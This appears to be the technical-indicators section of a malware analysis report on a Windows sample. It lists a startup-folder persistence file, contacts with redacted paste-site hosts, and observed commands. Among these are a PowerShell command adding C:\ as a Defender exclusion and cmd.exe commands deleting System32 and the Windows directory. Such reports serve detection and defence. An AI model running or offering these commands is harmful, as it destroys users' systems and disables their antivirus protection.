Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\inteldriver.exe
- C:\users\public\expuslog.txt
- 'ha###bin.com':443
- 'pa###bin.com':443
- DNS ASK ha###bin.com
- DNS ASK pa###bin.com
- '%APPDATA%\microsoft\windows\start menu\programs\startup\inteldriver.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\' (with hidden window)
- '%APPDATA%\microsoft\windows\start menu\programs\startup\inteldriver.exe' ' (with hidden window)
- '<SYSTEM32>\cmd.exe' /K del /q "%WINDIR% \System32\*" & exit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /K rmdir "%WINDIR% \System32" & exit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /K rmdir "%WINDIR% \" & exit' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-MpPreference -verbose
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\
- '<SYSTEM32>\cmd.exe' /K del /q "%WINDIR% \System32\*" & exit
- '<SYSTEM32>\cmd.exe' /K rmdir "%WINDIR% \System32" & exit
- '<SYSTEM32>\cmd.exe' /K rmdir "%WINDIR% \" & exit